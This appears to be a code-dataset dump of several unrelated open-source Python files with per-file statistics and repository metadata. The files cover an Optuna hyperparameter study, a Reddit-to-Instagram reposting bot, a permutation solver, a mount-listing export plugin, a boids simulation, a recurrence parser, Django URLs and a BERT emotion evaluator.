'--log_dir', default='./logs/experiment_01/', type=str)
return parser
def main(parser: ArgumentParser = None, **kwargs):
"""Use kwargs to overload argparse args."""
# ------------
# args
# ------------
if parser is None:
parser = ArgumentParser()
parser = Objective.add_project_specific_args(parser)
parser = pl.Trainer.add_argparse_args(parser)
parser = Q10Model.add_model_specific_args(parser)
parser.add_argument('--create_study', action='store_true', help='create new study (deletes old) and exits')
parser.add_argument('--single_seed', action='store_true', help='use only one seed instead of (1, ..., 10).')
args = parser.parse_args()
globargs = TRAINER_ARGS.copy()
globargs.update(kwargs)
for k, v in globargs.items():
setattr(args, k, v)
# ------------
# study setup
# ------------
search_space = {
'q10_init': [0.5, 1.5, 2.5],
'seed': [0] if args.single_seed else [i for i in range(10)],
'dropout': [0.0, 0.2, 0.4, 0.6],
'use_ta': [True, False]
}
sql_file = os.path.abspath(os.path.join(args.log_dir, "optuna.db"))
sql_path = f'sqlite:///{sql_file}'
if args.create_study | (not os.path.isfile(sql_file)):
if os.path.isdir(args.log_dir):
shutil.rmtree(args.log_dir)
os.makedirs(args.log_dir, exist_ok=True)
study = optuna.create_study(
study_name="q10hybrid",
storage=sql_path,
sampler=optuna.samplers.GridSampler(search_space),
direction='minimize',
load_if_exists=False)
if args.create_study:
return None
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
# ------------
# run study
# ------------
n_trials = 1
for _, v in search_space.items():
n_trials *= len(v)
study = optuna.load_study(
study_name="q10hybrid",
storage=sql_path,
sampler=optuna.samplers.GridSampler(search_space))
study.optimize(Objective(args), n_trials=n_trials)
if __name__ == '__main__':
main()
| 32.130045
| 112
| 0.579204
| 839
| 7,165
| 4.72348
| 0.330155
| 0.020187
| 0.017663
| 0.014635
| 0.09084
| 0.081252
| 0.055514
| 0.055514
| 0.040373
| 0.040373
| 0
| 0.029578
| 0.282763
| 7,165
| 222
| 113
| 32.274775
| 0.741584
| 0.105234
| 0
| 0.074324
| 0
| 0
| 0.101067
| 0.014595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.074324
| 0
| 0.128378
| 0.006757
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880bad578d9944f1ec06e580824fc923f1978b8e
| 2,886
|
py
|
Python
|
main.py
|
warifp/InstagramPostAndDelete
|
d22577325eccf42e629cef076ab43f7788587bc4
|
[
"MIT"
] | 4
|
2019-06-03T04:00:51.000Z
|
2021-11-09T21:34:38.000Z
|
main.py
|
nittaya1990/InstagramPostAndDelete
|
d22577325eccf42e629cef076ab43f7788587bc4
|
[
"MIT"
] | null | null | null |
main.py
|
nittaya1990/InstagramPostAndDelete
|
d22577325eccf42e629cef076ab43f7788587bc4
|
[
"MIT"
] | 4
|
2019-10-30T19:44:08.000Z
|
2021-09-07T16:30:09.000Z
|
#! @@Author : WAHYU ARIF PURNOMO
#! @@Create : 18 Januari 2019
#! @@Modify : 19 Januari 2019
#! Gambar dari reddit.
#! Gunakan VPN karena DNS situs reddit sudah di blokir dari negara Indonesia.
import os
import json
import requests
import progressbar
from PIL import Image
from lxml import html
from time import sleep
from ImageDeleter import delete_png
from InstagramAPI import InstagramAPI
InstagramAPI = InstagramAPI(input("Username: "), input("Password: "))
while True:
if (InstagramAPI.login()):
break
else:
for x in range(300):
os.system('cls')
print(300-x)
sleep(1)
global useable
useable = []
os.system('pause')
def get_image():
print("Memulai mendapatkan gambar ..")
json_raw = requests.get('https://www.reddit.com/r/me_irl/new/.json', headers = {'User-agent': 'Image_Testing_V3'}).json()
json_data = json_raw['data']
json_children = json_data['children']
for x in range(len(json_children)):
json_current = json_children[x]
json_current_data = json_current['data']
json_current_url = json_current_data['url']
if "https://i.redd.it/" not in json_current_url:
pass
else:
if json_current_url not in useable:
useable.append(json_current_url)
download()
else:
pass
def download():
print("Memulai download ..")
global filename
new_filename = ""
filename = useable[-1]
filename = filename.replace("https://i.redd.it/", "")
print(filename)
f = open(filename, 'wb')
f.write(requests.get(useable[-1]).content)
f.close()
if (filename[-3] + filename[-2] + filename[-1]) != 'jpg':
im = Image.open(filename)
for x in range(len(filename)-3):
new_filename = new_filename + filename[x]
im = im.convert("RGB")
im.save("edit" + new_filename + 'jpg')
new_filename = "edit" + new_filename + "jpg"
print(new_filename)
else:
new_filename = filename
upload(new_filename)
def delete_image(bad_file):
print("Memulai menghapus gambar ..")
if (bad_file[0] + bad_file[1] + bad_file[2] + bad_file[3]) == "edit":
png_bad_file = ''
for x in range(len(bad_file)-3):
png_bad_file = png_bad_file + bad_file[x]
png_bad_file = png_bad_file + "png"
try:
os.remove(png_bad_file)
except Exception as e:
pass
os.remove(bad_file)
delete_png()
print("Selesai.")
wait()
def upload(file):
print("Memulai upload ..")
caption = ""
InstagramAPI.uploadPhoto(file, caption=caption)
delete_image(file)
def wait():
for i in progressbar.progressbar(range(1800)):
sleep(1)
while True:
get_image()
print("Gambar sukses di upload.")
sleep(5)
os.system('pause')
| 28.574257
| 125
| 0.615731
| 372
| 2,886
| 4.61828
| 0.330645
| 0.057043
| 0.034924
| 0.025611
| 0.071595
| 0.023283
| 0
| 0
| 0
| 0
| 0
| 0.017274
| 0.257796
| 2,886
| 100
| 126
| 28.86
| 0.784781
| 0.063756
| 0
| 0.149425
| 0
| 0
| 0.114201
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057471
| false
| 0.045977
| 0.103448
| 0
| 0.16092
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880bf5d9dd1fda0ba4fc9eafcb000337f1273e4d
| 1,673
|
py
|
Python
|
DFS_Backtracking/31. Next Permutation.py
|
xli1110/LC
|
3c18b8809c5a21a62903060eef659654e0595036
|
[
"MIT"
] | 2
|
2021-04-02T11:57:46.000Z
|
2021-04-02T11:57:47.000Z
|
DFS_Backtracking/31. Next Permutation.py
|
xli1110/LC
|
3c18b8809c5a21a62903060eef659654e0595036
|
[
"MIT"
] | null | null | null |
DFS_Backtracking/31. Next Permutation.py
|
xli1110/LC
|
3c18b8809c5a21a62903060eef659654e0595036
|
[
"MIT"
] | null | null | null |
class Solution:
def __init__(self):
self.res = []
self.path = []
def arr_to_num(self, arr):
s = ""
for x in arr:
s += str(x)
return int(s)
def find_position(self, nums):
for i in range(len(self.res)):
if self.res[i] == nums:
if i == len(self.res) - 1:
return 0
# we need the check below for duplicate elements in nums
# run nums = [1, 5, 1] and see the case
next_num = self.arr_to_num(self.res[i + 1])
if next_num > self.arr_to_num(nums):
return i + 1
raise Exception("The permutation function has something wrong, please debug it.")
def DFS(self, arr):
if not arr:
self.res.append(self.path[:])
return
for i in range(len(arr)):
self.path.append(arr[i])
self.DFS(arr[:i] + arr[i + 1:])
self.path.pop()
def nextPermutation(self, nums: [int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
if not nums:
raise Exception("Empty Array")
# all permutations
# note that we need to SORT the array at first
arr = nums[:]
arr.sort()
self.DFS(arr)
# find position
position = self.find_position(nums)
# in-place replacement
for i in range(len(nums)):
nums[i] = self.res[position][i]
if __name__ == "__main__":
sol = Solution()
# nums = [2, 1, 3]
nums = [1, 5, 1]
sol.nextPermutation(nums)
print(sol.res)
| 26.140625
| 89
| 0.499701
| 218
| 1,673
| 3.733945
| 0.348624
| 0.060197
| 0.029484
| 0.040541
| 0.09828
| 0.046683
| 0
| 0
| 0
| 0
| 0
| 0.013579
| 0.383742
| 1,673
| 63
| 90
| 26.555556
| 0.775946
| 0.156007
| 0
| 0
| 0
| 0
| 0.058611
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.25
| 0.025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880c149eaa01b78f766f6b8032706b3698b74fbc
| 1,392
|
py
|
Python
|
plugin/DataExport/extend.py
|
konradotto/TS
|
bf088bd8432b1e3f4b8c8c083650a30d9ef2ae2e
|
[
"Apache-2.0"
] | 125
|
2015-01-22T05:43:23.000Z
|
2022-03-22T17:15:59.000Z
|
plugin/DataExport/extend.py
|
konradotto/TS
|
bf088bd8432b1e3f4b8c8c083650a30d9ef2ae2e
|
[
"Apache-2.0"
] | 59
|
2015-02-10T09:13:06.000Z
|
2021-11-11T02:32:38.000Z
|
plugin/DataExport/extend.py
|
konradotto/TS
|
bf088bd8432b1e3f4b8c8c083650a30d9ef2ae2e
|
[
"Apache-2.0"
] | 98
|
2015-01-17T01:25:10.000Z
|
2022-03-18T17:29:42.000Z
|
#!/usr/bin/python
# Copyright (C) 2015 Ion Torrent Systems, Inc. All Rights Reserved
import subprocess
import re
pluginName = 'DataExport'
pluginDir = ""
networkFS = ["nfs", "cifs"]
localFS = ["ext4", "ext3", "xfs", "ntfs", "exfat", "vboxsf"]
supportedFS = ",".join(localFS + networkFS)
def test(bucket):
return bucket
def runProcess(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return iter(p.stdout.readline, b'')
def runProcessAndReturnLastLine(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.stdout.readlines()[-1]
def backupDevices(bucket):
devices = ""
cmd = "mount -l -t " + supportedFS
for line in runProcess(cmd.split()):
line_arr = line.split()
folder = line_arr[2]
fstype = line_arr[4]
perms = line_arr[5]
if perms.find('w') != -1:
use = True
if fstype in localFS:
m = re.match('^(/media|/mnt)', folder)
if not m:
use = False
if use:
cmd2 = "df -h %s " % folder
df = runProcessAndReturnLastLine(cmd2.split())
avail = df.split()[2]
devices = devices + "<OPTION VALUE=\"" + folder + "\">" + folder + " (" + avail + " free, " + fstype + ")</option>"
return devices
| 27.84
| 131
| 0.569684
| 156
| 1,392
| 5.057692
| 0.538462
| 0.035488
| 0.035488
| 0.048162
| 0.17744
| 0.17744
| 0.17744
| 0.17744
| 0.17744
| 0.17744
| 0
| 0.014042
| 0.283764
| 1,392
| 49
| 132
| 28.408163
| 0.777332
| 0.05819
| 0
| 0.057143
| 0
| 0
| 0.097021
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114286
| false
| 0
| 0.057143
| 0.028571
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880c1d871834c4fa9a80907f77053c53af975688
| 5,205
|
py
|
Python
|
boids/biods_object.py
|
PaulAustin/sb7-pgz
|
fca3e50132b9d1894fb348b2082e83ce7b937b19
|
[
"MIT"
] | 1
|
2022-02-21T15:54:01.000Z
|
2022-02-21T15:54:01.000Z
|
boids/biods_object.py
|
PaulAustin/sb7-pgz
|
fca3e50132b9d1894fb348b2082e83ce7b937b19
|
[
"MIT"
] | null | null | null |
boids/biods_object.py
|
PaulAustin/sb7-pgz
|
fca3e50132b9d1894fb348b2082e83ce7b937b19
|
[
"MIT"
] | 2
|
2020-11-21T16:34:22.000Z
|
2021-01-27T10:30:34.000Z
|
# Ported from JavaSript version to Python and Pygame Zero
# Designed to work well with mu-editor environment.
#
# The original Javascript version wasdonw by Ben Eater
# at https://github.com/beneater/boids (MIT License)
# No endorsement implied.
#
# Complex numbers are are used as vectors to integrate x and y positions and velocities
# MIT licesense (details in parent directory)
import random
import time
HEIGHT = 500 # window height
WIDTH = 900 # window width
MARGIN = 150 # disstance to start avoid edge
NUM_BOIDS = 75
VISUAL_RANGE = 70 # radius of influence for most algoriths
SPEED_LIMIT_UPPER = 13 # boids canonly fly so fast.
SPEED_LIMIT_LOWER = 3 # boid will fall if flying too slow
SPEED_INIT = 20 # range for random velocity
MIN_DISTANCE = 10 # the distance to stay away from other boids
AVOID_FACTOR = 0.05 # % location change if too close
CENTERING_FACTOR = 0.050 # % location change to pull to center
MATCHING_FACTOR = 0.015 # % velocity change if close
MARGIN_FACTOR = 0.25+0.0j # rate of turning away from edge
HISTORY_LENGTH = 30
BACK_COLOR = (0, 0, 90)
BOID_COLOR = (255, 128, 128)
BOID_SIZE = 8
TRAIL_COLOR = (255, 255, 64)
g_boids = []
class Boid:
def __init__(boid) :
boid.loc = complex(
(random.randint(0, WIDTH)),
(random.randint(0, HEIGHT)))
boid.vel = complex(
(random.randint(-SPEED_INIT, SPEED_INIT)),
(random.randint(-SPEED_INIT, SPEED_INIT)))
boid.history = []
def keep_within_bounds(boid) :
# Constrain a boid to within the window. If it gets too close to an edge,
# nudge it back in and reverse its direction.
if (boid.loc.real < MARGIN):
boid.vel += MARGIN_FACTOR * 1.0
if (boid.loc.real > WIDTH - MARGIN) :
boid.vel += MARGIN_FACTOR * -1.0
if (boid.loc.imag < MARGIN) :
boid.vel += MARGIN_FACTOR * 1.0j
if (boid.loc.imag > HEIGHT - MARGIN) :
boid.vel += MARGIN_FACTOR * -1.0j
def fly_towards_center(boid):
# Find the center of mass of the other boids and
# adjust velocity slightly to point towards the
# center of mass.
center = 0+0j
num_neighbors = 0
for other_boid in g_boids :
if abs(boid.loc - other_boid.loc) < VISUAL_RANGE :
center += other_boid.loc
num_neighbors += 1
if num_neighbors > 0 :
center = center / num_neighbors
boid.loc += (center - boid.loc) * CENTERING_FACTOR
def avoid_others(boid):
# Move away from other boids that are too close to avoid colliding
move = 0+0j
for other_boid in g_boids :
if not (other_boid is boid) :
if abs(boid.loc - other_boid.loc) < MIN_DISTANCE :
move += boid.loc - other_boid.loc
boid.vel += move * AVOID_FACTOR
def match_velocity(boid):
# Find the average velocity (speed and direction)
# of the other boids and adjust velocity slightly to match.
avg_vel = 0+0j
num_neighbors = 0
for otherBoid in g_boids:
if abs(boid.loc - otherBoid.loc) < VISUAL_RANGE :
avg_vel += otherBoid.vel
num_neighbors += 1
if num_neighbors > 0:
avg_vel /= num_neighbors
boid.vel += (avg_vel - boid.vel) * MATCHING_FACTOR
def limit_speed(boid):
# Speed will naturally vary in flocking behavior,
# but real animals can't go arbitrarily fast (or slow)
speed = abs(boid.vel)
if (speed > SPEED_LIMIT_UPPER) :
boid.vel = boid.vel / speed * SPEED_LIMIT_UPPER
if (speed < SPEED_LIMIT_LOWER) :
boid.vel = boid.vel / speed * SPEED_LIMIT_LOWER
return
def draw(boid):
screen.draw.filled_circle((boid.loc.real, boid.loc.imag), BOID_SIZE, BOID_COLOR)
tail = boid.loc + boid.vel * -1.8
screen.draw.line(
(boid.loc.real, boid.loc.imag),
(tail.real, tail.imag),
BOID_COLOR)
def draw_trail(boid):
pt_from = (boid.loc.real, boid.loc.imag)
for p in boid.history:
pt_to = (p.real, p.imag)
screen.draw.line(pt_from, pt_to, TRAIL_COLOR)
pt_from = pt_to
def draw():
screen.fill(BACK_COLOR)
if keyboard.space:
for boid in g_boids:
boid.draw_trail()
for boid in g_boids:
boid.draw()
screen.draw.text("space:tails r:restart", (20, 20))
def update():
for boid in g_boids:
# Apply rules
boid.fly_towards_center()
boid.avoid_others()
boid.match_velocity()
boid.limit_speed()
boid.keep_within_bounds()
# Update the position based on the current velocity
boid.loc += boid.vel
boid.history.insert(0, boid.loc)
boid.history = boid.history[:HISTORY_LENGTH]
def init():
global g_boids
g_boids = [Boid() for _ in range(NUM_BOIDS)]
def on_key_down(key, mod, unicode):
if (key == keys.R):
init()
init()
| 31.932515
| 88
| 0.602882
| 714
| 5,205
| 4.2493
| 0.292717
| 0.055372
| 0.015821
| 0.019776
| 0.223797
| 0.212591
| 0.158866
| 0.051417
| 0.051417
| 0.023731
| 0
| 0.024722
| 0.308357
| 5,205
| 162
| 89
| 32.12963
| 0.818056
| 0.244573
| 0
| 0.117117
| 0
| 0
| 0.005644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108108
| false
| 0
| 0.018018
| 0
| 0.144144
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880d1df9e7fa8cda82be2e587cdbae5ea94afb44
| 4,960
|
py
|
Python
|
upoutdf/types/recurring/yearly.py
|
UpOut/UpOutDF
|
5d2f87884565d98b77e25c6a26af7dbea266be76
|
[
"MIT"
] | null | null | null |
upoutdf/types/recurring/yearly.py
|
UpOut/UpOutDF
|
5d2f87884565d98b77e25c6a26af7dbea266be76
|
[
"MIT"
] | null | null | null |
upoutdf/types/recurring/yearly.py
|
UpOut/UpOutDF
|
5d2f87884565d98b77e25c6a26af7dbea266be76
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import pytz
from dateutil.relativedelta import relativedelta
from .base import BaseRecurring
from upoutdf.occurences import OccurenceBlock, OccurenceGroup
from upoutdf.constants import YEARLY_TYPE
class YearlyType(BaseRecurring):
year_day = None
required_attributes = [
'every',
'timezone',
'starting_time',
'lasting_seconds',
'type',
'starting_date'
]
def increment_by(self):
return relativedelta(years=+self.every)
def _snap_datetime(self,datetime,yearday):
if datetime is None:
return None
snapper = self.snapping_class(self.timezone)
return snapper.snap_to_year_day(datetime,yearday)
def _canonicalize_date(self,date):
if not date.tzinfo:
date = date.replace(tzinfo=pytz.utc)
if date.tzinfo != self.timezone:
date = self.timezone.normalize(date.astimezone(self.timezone))
return date
def canonicalize(self):
canonical = "every %s year" % self.every
if self.year_day is not None:
canonical = "%s day %s" % (
canonical,
self.year_day
)
#(starting <datetimestring>) (ending <datetimestring>)
if not self.starting_date_infinite:
starting_date = self._canonicalize_date(self.starting_date)
canonical = "%s starting %s" % (
canonical,
starting_date.strftime("_%m/%d/%Y")
)
if not self.ending_date_infinite:
ending_date = self._canonicalize_date(self.ending_date)
canonical = "%s ending %s" % (
canonical,
ending_date.strftime("_%m/%d/%Y")
)
if self.repeating_count is not None:
canonical = "%s repeating %s times" % (
canonical,
self.repeating_count
)
starting_time = self._canonicalize_date(self.starting_time)
canonical = "%s at %s" % (
canonical,
starting_time.strftime("%-I:%M%p")
)
canonical = "%s lasting %s seconds in %s" % (
canonical,
self.lasting_seconds,
str(self.timezone)
)
return canonical
def occurences(self):
if not self.verify_parsed():
raise RuntimeError("Please call parse before calling occurences")
ending = self.ending_date
repeating_count = self.repeating_count
ending_date_infinite = self.ending_date_infinite
if repeating_count is not None:
ending_date_infinite = False
if ending is not None:
ending = self._set_start_time(ending)
ending = self._strip_microseconds(ending)
occurence_start = self.starting_date
if self.year_day is not None:
try:
occurence_start = self._snap_datetime(self.starting_date,self.year_day)
except ValueError:
#If we had a problem, try the next year
occurence_start = self._snap_datetime(
self.starting_date+relativedelta(years=+1),
self.year_day
)
occurence_start = self._set_start_time(occurence_start)
occurence_start = self._strip_microseconds(occurence_start)
occurence_block = OccurenceBlock(
starting_date=occurence_start,
ending_date=None,
starting_date_infinite=self.starting_date_infinite,
ending_date_infinite=ending_date_infinite,
typeobj=self
)
repeated = 1
occurence_end = None
#While we're before the end date (if we have it)
#And we're before the max repetetions (if we have it)
while ((ending is None or occurence_start <= ending)
and (repeating_count is None or repeated <= repeating_count)):
occurence_end = self._get_end_datetime(occurence_start)
occurence_end = self._strip_microseconds(occurence_end)
occurence_block.add_occurence(occurence_start,occurence_end)
occurence_start = self._increment_occurence(occurence_start)
occurence_start = self._strip_microseconds(occurence_start)
repeated+=1
occurence_block.ending_date = occurence_end
#We always return a OccurenceGroup, even if just 1
return OccurenceGroup(blocks=[occurence_block])
def _parse_type(self,tokens):
if tokens[0] == 'day':
tokens = self._step_tokens(tokens)
try:
self.year_day = int(tokens[0])
except ValueError:
raise ValueError("Invalid year day")
tokens = self._step_tokens(tokens)
self.type = YEARLY_TYPE
return tokens
| 30.060606
| 87
| 0.594153
| 526
| 4,960
| 5.359316
| 0.222433
| 0.074495
| 0.044697
| 0.025541
| 0.208585
| 0.125576
| 0.092941
| 0.077332
| 0.044697
| 0
| 0
| 0.002107
| 0.330242
| 4,960
| 164
| 88
| 30.243902
| 0.846478
| 0.050806
| 0
| 0.157895
| 0
| 0
| 0.053214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.04386
| 0.008772
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880d94d22915e741e24ad40b49de37d7ad8757e9
| 625
|
py
|
Python
|
project/urls.py
|
dbinetti/captable
|
29769b2b99a3185fda241b3087ccbe621f8c97a2
|
[
"BSD-2-Clause"
] | 18
|
2016-05-12T18:49:09.000Z
|
2021-10-05T13:29:09.000Z
|
project/urls.py
|
dbinetti/captable
|
29769b2b99a3185fda241b3087ccbe621f8c97a2
|
[
"BSD-2-Clause"
] | null | null | null |
project/urls.py
|
dbinetti/captable
|
29769b2b99a3185fda241b3087ccbe621f8c97a2
|
[
"BSD-2-Clause"
] | 5
|
2015-08-28T02:50:30.000Z
|
2019-11-14T04:03:05.000Z
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic import TemplateView
urlpatterns = patterns(
'',
url(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),
url(r'^about/$', TemplateView.as_view(template_name='about.html'), name='about'),
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('apps.captable.urls',)),
)
urlpatterns += staticfiles_urlpatterns()
| 31.25
| 85
| 0.7248
| 79
| 625
| 5.658228
| 0.367089
| 0.044743
| 0.076063
| 0.116331
| 0.134228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1088
| 625
| 19
| 86
| 32.894737
| 0.802513
| 0
| 0
| 0
| 0
| 0
| 0.1664
| 0.0464
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880ea7ec7f81ab78d2446766017eac398be3d80f
| 9,388
|
py
|
Python
|
common/evaluators/bert_emotion_evaluator.py
|
marjanhs/procon20
|
c49ad38a77e58fd84ff0409cc9f5081c6de0bf0b
|
[
"MIT"
] | 5
|
2020-07-12T08:27:47.000Z
|
2021-10-16T11:40:48.000Z
|
common/evaluators/bert_emotion_evaluator.py
|
marjanhs/procon20
|
c49ad38a77e58fd84ff0409cc9f5081c6de0bf0b
|
[
"MIT"
] | null | null | null |
common/evaluators/bert_emotion_evaluator.py
|
marjanhs/procon20
|
c49ad38a77e58fd84ff0409cc9f5081c6de0bf0b
|
[
"MIT"
] | 1
|
2021-04-12T09:54:37.000Z
|
2021-04-12T09:54:37.000Z
|
import warnings
import numpy as np
import torch
import torch.nn.functional as F
from sklearn import metrics
from torch.utils.data import DataLoader, SequentialSampler, TensorDataset
from tqdm import tqdm
from datasets.bert_processors.abstract_processor import convert_examples_to_features_with_emotion, \
convert_examples_to_hierarchical_features
from utils.preprocessing import pad_input_matrix
from utils.tokenization import BertTokenizer
from utils.emotion import Emotion
# Suppress warnings from sklearn.metrics
warnings.filterwarnings('ignore')
class BertEvaluator(object):
def __init__(self, model, processor, args, split='dev'):
self.args = args
self.model = model
self.processor = processor
self.tokenizer = BertTokenizer.from_pretrained(args.model, is_lowercase=args.is_lowercase)
self.emotioner = Emotion(args.nrc_path, args.max_em_len, args.emotion_filters)
if split == 'test':
self.eval_examples = self.processor.get_test_examples(args.data_dir, args.test_name)
elif split == 'dev':
self.eval_examples = self.processor.get_dev_examples(args.data_dir, args.dev_name)
else:
self.eval_examples = self.processor.get_any_examples(args.data_dir, split)
def get_scores(self, silent=False, return_indices=False):
all_indices = []
if self.args.is_hierarchical:
eval_features = convert_examples_to_hierarchical_features(
self.eval_examples, self.args.max_seq_length, self.tokenizer)
else:
eval_features = convert_examples_to_features_with_emotion(
self.eval_examples, self.args.max_seq_length, self.tokenizer, self.emotioner)
unpadded_input_ids = [f.input_ids for f in eval_features]
unpadded_input_mask = [f.input_mask for f in eval_features]
unpadded_segment_ids = [f.segment_ids for f in eval_features]
unpadded_emotion_scores = [f.sentiment_scores for f in eval_features]
if self.args.is_hierarchical:
pad_input_matrix(unpadded_input_ids, self.args.max_doc_length)
pad_input_matrix(unpadded_input_mask, self.args.max_doc_length)
pad_input_matrix(unpadded_segment_ids, self.args.max_doc_length)
padded_input_ids = torch.tensor(unpadded_input_ids, dtype=torch.long)
padded_input_mask = torch.tensor(unpadded_input_mask, dtype=torch.long)
padded_segment_ids = torch.tensor(unpadded_segment_ids, dtype=torch.long)
padded_emotion_ids = torch.tensor(unpadded_emotion_scores, dtype=torch.long)
label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)
eval_data = TensorDataset(padded_input_ids, padded_input_mask, padded_segment_ids, padded_emotion_ids, label_ids)
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=self.args.batch_size)
self.model.eval()
total_loss = 0
nb_eval_steps, nb_eval_examples = 0, 0
predicted_labels, target_labels = list(), list()
for input_ids, input_mask, segment_ids, emotion_ids, label_ids in tqdm(eval_dataloader, desc="Evaluating", disable=silent):
input_ids = input_ids.to(self.args.device)
input_mask = input_mask.to(self.args.device)
segment_ids = segment_ids.to(self.args.device)
emotion_ids = emotion_ids.to(self.args.device)
label_ids = label_ids.to(self.args.device)
with torch.no_grad():
if return_indices:
outs = self.model(input_ids, segment_ids, input_mask, emotion_ids=emotion_ids, return_indices=return_indices)
else:
outs = self.model(input_ids, segment_ids, input_mask, emotion_ids=emotion_ids)
if isinstance(outs, tuple):
outs, _ = outs
if return_indices:
logits, indices = outs
all_indices.extend(indices.cpu().detach().numpy())
else:
logits = outs
if self.args.is_multilabel:
predicted_labels.extend(F.sigmoid(logits).round().long().cpu().detach().numpy())
target_labels.extend(label_ids.cpu().detach().numpy())
loss = F.binary_cross_entropy_with_logits(logits, label_ids.float(), size_average=False)
average, average_mac = 'micro', 'macro'
else:
predicted_labels.extend(torch.argmax(logits, dim=1).cpu().detach().numpy())
target_labels.extend(torch.argmax(label_ids, dim=1).cpu().detach().numpy())
loss = F.cross_entropy(logits, torch.argmax(label_ids, dim=1))
average, average_mac = 'binary', 'binary'
if self.args.n_gpu > 1:
loss = loss.mean()
if self.args.gradient_accumulation_steps > 1:
loss = loss / self.args.gradient_accumulation_steps
total_loss += loss.item()
nb_eval_examples += input_ids.size(0)
nb_eval_steps += 1
predicted_labels, target_labels = np.array(predicted_labels), np.array(target_labels)
accuracy = metrics.accuracy_score(target_labels, predicted_labels)
precision = metrics.precision_score(target_labels, predicted_labels, average=average)
recall = metrics.recall_score(target_labels, predicted_labels, average=average)
avg_loss = total_loss / nb_eval_steps
hamming_loss = metrics.hamming_loss(target_labels, predicted_labels)
jaccard_score = metrics.jaccard_score(target_labels, predicted_labels, average=average)
f1_micro = metrics.f1_score(target_labels, predicted_labels, average=average)
f1_macro = metrics.f1_score(target_labels, predicted_labels, average=average_mac)
if return_indices:
return [accuracy, precision, recall, f1_micro, avg_loss, f1_macro, hamming_loss, jaccard_score, predicted_labels, target_labels, all_indices],\
['accuracy', 'precision', 'recall', 'f1_micro', 'avg_loss', 'f1_macro', 'hamming_loss', 'jaccard', 'predicted_labels', 'target_labels', 'all_indices']
else:
return [accuracy, precision, recall, f1_micro, avg_loss, f1_macro, hamming_loss, jaccard_score, predicted_labels, target_labels],\
['accuracy', 'precision', 'recall', 'f1_micro', 'avg_loss', 'f1_macro', 'hamming_loss', 'jaccard', 'predicted_labels', 'target_labels']
def get_bert_layers(self, silent=False, last_bert_layers=-1):
if self.args.is_hierarchical:
eval_features = convert_examples_to_hierarchical_features(
self.eval_examples, self.args.max_seq_length, self.tokenizer)
else:
eval_features = convert_examples_to_features_with_emotion(
self.eval_examples, self.args.max_seq_length, self.tokenizer, self.emotioner)
unpadded_input_ids = [f.input_ids for f in eval_features]
unpadded_input_mask = [f.input_mask for f in eval_features]
unpadded_segment_ids = [f.segment_ids for f in eval_features]
unpadded_emotion_ids = [f.emotioniment_scores for f in eval_features]
if self.args.is_hierarchical:
pad_input_matrix(unpadded_input_ids, self.args.max_doc_length)
pad_input_matrix(unpadded_input_mask, self.args.max_doc_length)
